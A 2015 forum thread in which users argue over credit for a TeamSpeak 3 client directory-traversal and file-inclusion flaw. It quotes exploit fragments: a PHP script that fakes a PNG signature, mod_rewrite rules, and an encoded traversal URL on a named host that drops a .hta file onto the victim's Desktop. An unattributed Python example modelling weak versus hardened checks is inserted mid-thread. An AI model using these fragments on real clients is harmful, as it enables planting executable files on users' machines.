TeamSpeak 3 RFI RCE Directory Traversal vulnerability / exploit

Asphyxia

Owner
Administrator
Apr 25, 2015
Note: Sit back and relax while reading through this thread, enjoy some popcorn maybe.

The TeamSpeak 3 exploit being published by "scurippio" (attention whore) is documented on many websites; he spammed them into kiddie exploit databases. On behalf of all the R4P3 researchers, that is irritating to us. We spent days of teamwork from the first discovery of this caching system issue to the full disclosure we did. We had this exploited successfully in early September (2015). No one else had mentioned this issue at that point in time. Most importantly, we would like our purpose to be known --- our one and only goal is to make TeamSpeak 3 safer for people by discovering security issues to be patched. So, you might ask why we even publish anything? We enjoy educating people on security; it is fun for us to teach people, see this: http://artofproblemsolving.com/articles/learning-through-teaching

The security issue was then leaked by one of our internal researchers. At that point in time we chose to offer up a full disclosure announcement in which we pretty much explained how it works, and any 13-year-old script kiddie could have stolen the information we provided to recreate the exploit (which is what apparently happened) --- what professional steals vulnerability findings? You're cool, man(.) :cool:

Most importantly scurippio, your published documentation on the exploit demonstrates you are a self-proclaimed black hat hacker, hah.

Code:
APPLICATIONNAME="OwnedByScurippio"

To conclude, R4P3 believes the TeamSpeak development team has acted appropriately in response to our full disclosure and thankfully they treated this security issue with seriousness to prevent script kiddies like scurippio from "owning" computer systems. WE ARE PROUD TO SAY THAT IF YOU UPDATE TO THE LATEST VERSION OF TEAMSPEAK 3, YOU ARE MUCH SAFER.

I would like to add that this is a REMOTE FILE INCLUSION and DIRECTORY TRAVERSAL attack, not a REMOTE CODE EXECUTION attack like Scurippio mentioned. There are many security issues working together here. The biggest security issue is the way Microsoft Windows systems handle Startup files and their creation... if your Startup folder was appropriately secured, this issue would be less concerning. TeamSpeak itself did not have an RCE (Remote Code Execution) vulnerability/exploit. The Windows system itself is just so weak that, without appropriate authorization, a startup file was placed. I would consider this a dropper attack, definitely not an RCE though. ;)
 

Asphyxia

I like Dante696 a little more today, +REP --- he called out Scurippio for claiming the exploit is not his. I think Dante deserves a hug, guys. :D

http://forum.teamspeak.com/threads/120981-0day-exploit-in-client-3-0-0-3-0-18-1?p=421579#post421579

Dante696 said:
I can not answer for devs or management and their decisions.
But I'm glad that we do not wait till 3.0.19 is ready to become a stable client.

About the exploit:
It wasn't exactly yours, but the result was the same.
We are still glad that you did report it to us. So we could test if this also was fixed in the latest beta release.

About the early release:
Some devs can not sleep at night.
There will be ***maybe*** more who report such exploit and we think not all will wait till we release a fixed version.
So we do it now instead of later.
 

Derp

Retired Staff
Contributor
Apr 30, 2015
http://seclists.org/bugtraq/2015/Oct/104
Copyright (c) 2015 Scurippio

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

...
 

User_418

Can you publish any way to protect a client and/or server from that?
 

Bodiga

Member
Oct 26, 2015
"To conclude, R4P3 believes the TeamSpeak development team has acted appropriately in response to our full disclosure and thankfully they treated this security issue with seriousness to prevent script kiddies like scurippio from "owning" computer systems."

Hey, I know that name. He found the exploit a year ago; he talked about his exploit at a conference, they have proof of this I think, and I think he doesn't know this site at all... and if he spread this, it is only as an anti-lamering measure.
So stop raging like a kid. If you have a vulnerability you must spot it, and don't cry when others spot the same... and I think you didn't check the date on zone-h (2005, 10 years ago...). scurippio's exploits are on the black market, not only for TeamSpeak.... and this is the first scurippio adv I have seen public on the web, honestly.. (0day for six hours).

I have read the adv; he doesn't say the RCE is in TeamSpeak, but that he can reach it using TeamSpeak as a vector. Read better...
Maybe you need more information to talk about that. The title is: rfi/directory traversal ___TO___ rce! That does not imply the RCE is in TeamSpeak!
 

Derp

Bodiga said:
So stop raging like a kid. If you have a vulnerability you must spot it, and don't cry when others spot the same... and I think you didn't check the date on zone-h (2005, 10 years ago...). scurippio's exploits are on the black market, not only for TeamSpeak.... and this is the first scurippio adv I have seen public on the web, honestly.. (0day for six hours).

I have read the adv; he doesn't say the RCE is in TeamSpeak, but that he can reach it using TeamSpeak as a vector. Read better...
Maybe you need more information to talk about that. The title is: rfi/directory traversal ___TO___ rce! That does not imply the RCE is in TeamSpeak!

"but he can reach that using teamspeak as a vector "

Not mentioned anywhere

his words were
The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code
execution.
---------------------------------------------------
As for the Report


In his "ADV" he says

The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response
is a real image, but you can easily bypass this control and put your exploit payload.
Code:
<?php
// Advertise a PNG and emit only the eight-byte PNG signature (\211 is octal for 0x89, \032 for 0x1A);
// whatever the script sends after this header is the attacker's payload.
header('Content-type: image/png');
echo "\211PNG\r\n\032\n";
?>

That is PLAIN WRONG,

He says he's tricking the image fetcher into downloading a file. That's not correct: the image fetcher NEVER checks the content; Teamspeak does the check once the file has been downloaded.

He's also saying

Code:
Example:

# Serve faker.php for every request path except faker.php itself,
# so any URL on the host (the traversal payload included) hits the same script.
RewriteEngine On
RewriteCond %{REQUEST_URI} !/faker.php
RewriteRule .* /faker.php

Which is also WRONG, as the ImageFetcher doesn't accept "Rewriting" (it will basically return a BAD Request error, even if you force a 200 state).

----------------------------------------------
Why am I writing this?

I'm writing this because we (the R4P3 DEV Team) worked very hard on this. Even after the data breach, this was under control, but we still decided to release it. And now someone else is getting the credit; this is NOT how it works.

If Scurippio can prove that he found this 1 year ago, then I invite him to register on the forum and post a reply in this thread where he provides proof that he found this 1 year ago.

In Conclusion

We have nothing personal against Scurippio. If he can prove that he found the RFI and successfully exploited it first, we will be happy to give him credit too.

-Derp
 

Bodiga

Wait, derp! Test your stuff better, plz.

I have tested the exploit and it works perfectly on 3.0.18.1 and prior versions!

Derp said:
1. Teamspeak (3.0.18.1) decodes the string and AFTER doing that it checks for ../
2. Teamspeak (3.0.18.1) then checks whether invalid extensions are present in the URL, BEFORE doing any further action

Not true, dude! Test it! The exploit works like a charm; the client doesn't check anything URL-encoded,
and you can forge .vbs, .pif, .scr; the only extensions checked are .bat, .com and .exe.

Derp said:
(It will basically return a BAD Request error, even if you force an ERROR 200 State)

Absolutely not! Have you tried it on Apache? Use the same rule in .htaccess, don't use [r,l=200], use scurippio's example and it works perfectly!

Derp said:
As the ImageFetcher doesn't accept "Rewriting"

The URL rewrite is fully transparent; the image fetcher can't see the difference between a real 200 resource and a 200 rewritten by mod_rewrite on Apache!

The image fetcher checks the content-type and the image header! Have you tested the exploit? Are you sure?

I will write scurippio an email; he can talk better about that.

Derp said:
Not mentioned anywhere

Read better...

"but he can reach that using teamspeak as a vector"

Oh yes: "and in my test case on "Windows" you can reach remote code execution,"
He does not say TS3 has an RCE bug!

Stop spreading false information about this vulnerability.

btw, as I can see from your post, I think you never saw that vulnerability before scurippio's adv/release....
 

Derp

Bodiga said:
Wait, derp! Test your stuff better, plz.

I have tested the exploit and it works perfectly on 3.0.18.1 and prior versions!

Not true, dude! Test it! The exploit works like a charm; the client doesn't check anything URL-encoded,
and you can forge .vbs, .pif, .scr; the only extensions checked are .bat, .com and .exe.

Absolutely not! Have you tried it on Apache? Use the same rule in .htaccess, don't use [r,l=200], use scurippio's example and it works perfectly!

The URL rewrite is fully transparent; the image fetcher can't see the difference between a real 200 resource and a 200 rewritten by mod_rewrite on Apache!

The image fetcher checks the content-type and the image header! Have you tested the exploit? Are you sure?

I will write scurippio an email; he can talk better about that.

Not mentioned anywhere:
Read better...

"but he can reach that using teamspeak as a vector"

Oh yes: "and in my test case on "Windows" you can reach remote code execution,"
He does not say TS3 has an RCE bug!

Stop spreading false information about this vulnerability.
I did a second check

It turns out the exploit works on 3.0.18.1

I apologise for my "disinformation" (I didn't see the %5c part)
As for the rest of the post

1. The Rewrite Method
I'll let @Asphyxia talk about that,

2. The ImageFetcher
Bodiga said:
The image fetcher checks the content-type and the image header! Have you tested the exploit? Are you sure?

That is actually not true.
Try downloading a .rar archive using the IMG tag and monitor your %appdata%/TS3Client/cache/remote folder.
The file gets downloaded; Teamspeak then checks the file's content, and if it doesn't detect it as a valid image, it NullBytes it.
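The two checks the last few posts argue about (whether the client looks for "../" before or after percent-decoding, which extensions it refuses, and whether a PNG signature on its own is accepted as proof of an image) are easier to reason about in code. What follows is an added example written for this page; it is not TeamSpeak's code and not from any post in the thread. It models a weak version of each check next to a hardened one. The cache root (following the %appdata%\TS3Client\cache\remote location named above), the blacklist and allowlist, the URLs, the Desktop target and the byte strings are all constructed for illustration; the traversal URL only copies the shape of the facepunch test link quoted later in the thread.

```python
"""
Added example, not TeamSpeak code: a model of a weak and a hardened version of
the path check and the image check discussed in this thread. Every constant
below is constructed for illustration; no real client internals are reproduced.
"""
import ntpath
from urllib.parse import unquote, urlsplit

# Assumed cache location, following the %appdata%\TS3Client\cache\remote path named in the thread.
CACHE_ROOT = r"C:\Users\victim\AppData\Roaming\TS3Client\cache\remote"
BLACKLIST = {".bat", ".com", ".exe"}            # the only extensions the thread says were rejected
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}   # assumption: what an image cache should ever write
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"                # the eight bytes the advisory's PHP snippet emits
IEND_CHUNK = b"\x00\x00\x00\x00IEND\xaeB`\x82"  # zero-length IEND chunk with its fixed CRC


def _resolve_under_root(relative: str) -> str:
    """Join onto the cache root and collapse '..' with Windows path rules (no filesystem access)."""
    return ntpath.normpath(ntpath.join(CACHE_ROOT, relative))


def _ext(path: str) -> str:
    return ntpath.splitext(path)[1].lower()


def naive_cache_path(url: str):
    """Weak ordering modelled on the thread's description: the traversal test runs on the
    still-encoded path and only looks for '../', the extension test is a short blacklist,
    and percent-decoding happens last. Returns the path the file would be written to, or None."""
    raw = urlsplit(url).path.lstrip("/")
    if "../" in raw:                 # never sees '%2e%2e%5c', and never considers a backslash
        return None
    if _ext(raw) in BLACKLIST:       # .hta, .vbs, .scr, .pif sail through
        return None
    return _resolve_under_root(unquote(raw))   # '%2e%2e%5c' becomes '..\' only now


def hardened_cache_path(url: str):
    """Decode first, keep only the final path component, allowlist the extension, and still
    verify that the resolved target stays under the cache root."""
    decoded = unquote(urlsplit(url).path)
    basename = decoded.replace("/", "\\").rsplit("\\", 1)[-1]   # a cache never needs remote dirs
    if not basename or _ext(basename) not in ALLOWLIST:
        return None
    target = _resolve_under_root(basename)
    if not ntpath.normcase(target).startswith(ntpath.normcase(CACHE_ROOT) + "\\"):
        return None                  # defence in depth: refuse anything that escaped the root
    return target


def looks_like_png_by_magic(data: bytes) -> bool:
    """The kind of check the advisory's snippet defeats: only the signature is compared."""
    return data.startswith(PNG_MAGIC)


def is_structurally_png(data: bytes) -> bool:
    """Stricter: signature, then a 13-byte IHDR as the first chunk, then a terminating IEND.
    Eight signature bytes glued onto an arbitrary payload fail this. A production check
    should go further and actually decode the image."""
    if not data.startswith(PNG_MAGIC) or len(data) < 8 + 25 + 12:
        return False
    if int.from_bytes(data[8:12], "big") != 13 or data[12:16] != b"IHDR":
        return False
    return data.endswith(IEND_CHUNK)


# Constructed inputs: a traversal URL shaped like the facepunch test link, and a PNG-tagged payload.
TRAVERSAL_URL = ("http://example.invalid/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c"
                 "Desktop%5cteamspeak.hta")
BENIGN_URL = "http://example.invalid/avatars/user.png"
SPOOFED_IMAGE = PNG_MAGIC + b"<html><script>/* payload */</script></html>"
MINIMAL_PNG = (PNG_MAGIC
               + (13).to_bytes(4, "big") + b"IHDR" + bytes(13) + b"\x00\x00\x00\x00"  # CRC not checked here
               + IEND_CHUNK)

if __name__ == "__main__":
    print("naive    :", naive_cache_path(TRAVERSAL_URL))
    print("hardened :", hardened_cache_path(TRAVERSAL_URL))
    print("magic-only check accepts spoof :", looks_like_png_by_magic(SPOOFED_IMAGE))
    print("structural check accepts spoof :", is_structurally_png(SPOOFED_IMAGE))
```

The naive path resolves the traversal URL to the user's Desktop while the hardened one rejects it; the five `%2e%2e%5c` segments are exactly what a "../"-only test performed before decoding never sees. Likewise the spoofed bytes pass the signature-only test and fail the structural one, which is the whole point of the advisory's PHP snippet.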
 

Bodiga

Derp said:
I did a second check

It turns out the exploit works on 3.0.18.1

I apologise for my "disinformation" (I didn't see the %5c part)
As for the rest of the post

1. The Rewrite Method
I'll let @Asphyxia talk about that,

You can trust me, dude! :D Tested, and I have worked with rewrite for years.

Derp said:
2. The ImageFetcher

That is actually not true,
Try downloading a .rar archive using the IMG tag, monitor your %appdata%/TS3Client/cache/remote folder
The file gets downloaded, Teamspeak then checks the file's content and if it doesn't detect it as a valid image, it NullBytes it

Yes, it is a 0-byte file, because they check the file header signature; if you put the right header (check scurippio's example) you can fill the file with arbitrary data.

So it is actually true.

btw, are you sure your security team spotted the same vulnerability? Reading your posts, it seems you don't know the details of that exploit/vulnerability.
 

Derp

Bodiga said:
Yes, it is a 0-byte file, because they check the file header signature; if you put the right header (check scurippio's example) you can fill the file with arbitrary data.

So it is actually true.

You're right, but that is not being handled by the Image Fetcher (if that's what you meant).
The check is being done AFTER the file is downloaded, NOT before.

Edit: Can you please ask Scurippio to register on the forums and start a Private Conversation about this with the rest of the DevTeam?
 

Bodiga

Ok! I will try to send an email to scurippio (I really don't know this guy and I'm not on familiar terms with him; I have only seen him once at an international event (CCC), so idk if he'll respond to me, let me try! :D)

Derp said:
The check is being done AFTER the file is being downloaded, NOT Before

Attach IDA Pro; you can see this check is before...
TS checks content-type and header, and if the condition is true it will start the download.

4 posts, 4 technical errors about this exploit. I really think you and your team never dealt with this vulnerability and never saw it before the public release... and you call others "script kiddies"?

The fun part of this post is this:

Asphyxia said:
our one and only goal is to make TeamSpeak 3 safer for people by discovering security issues to be patched. So, you might ask why we even publish anything? We enjoy educating people on security, it is fun for us to teach people, see this: http://artofproblemsolving.com/articles/learning-through-teaching

The security issue was then leaked by one of our internal researchers.

1. It seems your team hasn't tested that vuln; your considerations are full of errors.
2. If you want to claim security research as scurippio has done, or help others, you must release the info to the public, not make that excuse... this results in "script kiddies"; "it is fun for us to teach people": for other people IT security is a real deal, not a fun fact, so deal with it.
3. It is too simple to claim now that it is your research that leaked, and in fact apparently not, because you tested nothing and are spreading false info around that is full of errors.
 

Asphyxia.Cell

Member
Aug 13, 2015
For some reason you sound too much like a fan of S to come here and tell us what he found and what we did not find. Given that our community is home to tens of security findings (and many more undocumented) in regards to our favorite software, I can confidently vouch for my team in stating that we indeed were the first to document this security issue unless proven otherwise.

If this security issue was found over a year ago and discussed at a conference it would already be wild. My response to you is kindly to fuck off and quit challenging my team. We don't have to prove anything more to you, the burden is on the other end. We know that the JPEG "y0" header or other types is required at the top of the file. It looks like S made the attack as a follow up to the first hotfix --- why is that? Because he encoded the URL when that was unnecessary in the first attack.

Just because you can use a cracked IDA that you downloaded from some Hack Forums post does not qualify you to judge whether we did or did not find this security issue first. You speak too much like you know him more than from seeing him just once.

You are probably a friend of his or maybe even more. Just don't come here stepping on toes, because we have no respect for the black attitude.

In addition, mod_rewrite may work. I only tried htacc and changing the header with PHP (200), that was not working --- so we found it to work perfectly fine with an FTP server. Thanks to Kap for working with the FTP side of things. The client kept logging errors, 302 if I remember correctly while every other browser returned a 200. We may not be the best team in the world, but we definitely make things work or make things break when we combine our skills.
 

Derp

Bodiga said:
1. It seems your team hasn't tested that vuln; your considerations are full of errors.
2. If you want to claim security research as scurippio has done, or help others, you must release the info to the public, not make that excuse... this results in "script kiddies"; "it is fun for us to teach people": for other people IT security is a real deal, not a fun fact, so deal with it.
3. It is too simple to claim now that it is your research that leaked, and in fact apparently not, because you tested nothing and are spreading false info around that is full of errors.

You keep saying that our report is full of errors, but you are not providing any proof of that.

You're basically saying that we are wrong just because you're saying it works in a different way, Which doesn't make sense

Could you please provide proof that actually proves that you're right?
 

Bodiga

....

Asphyxia.Cell said:
Just because you can use a cracked IDA that you downloaded from some Hack Forums post does not qualify you to judge whether we did or did not find this security issue first. You speak too much like you know him more than from seeing him just once.

And if I have a cracked IDA, does my skill change? Seems legit...
btw, I paid for that :)
and I'm not a fan; I'm just talking about this because I found this post googling around about it, and not every conference out there is public... sorry dude :)

Asphyxia.Cell said:
You are probably a friend of his or maybe even more. Just don't come here stepping on toes, because we have no respect for the black attitude.

Unfortunately no! Sorry!

Asphyxia.Cell said:
In addition, mod_rewrite may work. I only tried htacc and changing the header with PHP (200), that was not working --- so we found it to work perfectly fine with an FTP server. Thanks to Kap for working with the FTP side of things. The client kept logging errors, 302 if I remember correctly while every other browser returned a 200. We may not be the best team in the world, but we definitely make things work or make things break when we combine our skills.

And for you:

Derp said:
You keep saying that our report is full of errors, but you are not providing any proof of that.

You're basically saying that we are wrong just because you're saying it works in a different way, Which doesn't make sense

Could you please provide proof that actually proves that you're right?

Random members on facepunch can also prove it, because they tested scurippio's exploit like me:
https://facepunch.com/showthread.php?t=1490990

That demonstrates a lot about you and your team, dude.
 

Derp

Bodiga said:
And if I have a cracked IDA, does my skill change? Seems legit...
btw, I paid for that :)
and I'm not a fan; I'm just talking about this because I found this post googling around about it,

Unfortunately no! Sorry!

And for you:

Random members on facepunch can also prove it, because they tested scurippio's exploit like me:
https://facepunch.com/showthread.php?t=1490990

That demonstrates a lot about you and your team, dude.


Oh, Well, I only see 2 posts

One is saying "<3 you ts and your exploits"

And the second one is basically a copy paste what Scurippio wrote in his report, which I already talked about

"Not demonstrating much after all, don't you think?"
 

Bodiga

Dude, plz,

read better...
from the facepunch post...
If you can't test correctly, it is your lack of knowledge.

https://facepunch.com/showthread.php?t=1490990
Edited:

Test file for anyone who wants to test it: http://shodan.me/teamspeak.hta
You can put anything between the / and teamspeak and it will work. For example:
http://shodan.me/%2e%2e%5c%2e%2e%5c%...cteamspeak.hta

That should make a file on your desktop called teamspeak.hta. The file is harmless; it just launches calculator:

Now the hoster has taken the host down. If you really need it,
and if you don't believe me or the random facepunch members,
wait for the exploit-db confirmation; it's pending verification.
I have tested it myself, and others too.

https://www.exploit-db.com/

btw, any publication on bugtraq and packetstorm is already verified.

https://packetstormsecurity.com/files/134050/TS3Client-3.0-3.0.18.1.txt
http://seclists.org/bugtraq/2015/Oct/101

I think you can't test this exploit because of your lack of knowledge,
and that totally confirms this is not your/your team's exploit/research...
 

ehthe

Retired Staff
Contributor
Apr 26, 2015
This isn't getting anywhere. The exploit is a simple directory traversal. Why bother debating it? It's fixed, guys!
 

Derp

That's something I already talked about.

Once again, that post is not demonstrating anything. It's just saying, "Hey, Scurippio's exploit is working."
And this is not what we are talking about. We know it's working; we are talking about the "INFO" he provided:

the way the ImageFetcher works, and the way the Rewrite module gets implemented to make the exploit work.

Neither of the two is mentioned in that post.

Edit: This conversation is getting too far; I won't respond to any further responses in this thread.
As I said in the earlier posts, I invite Scurippio to register on the forums and start a private conversation.

-Derp
 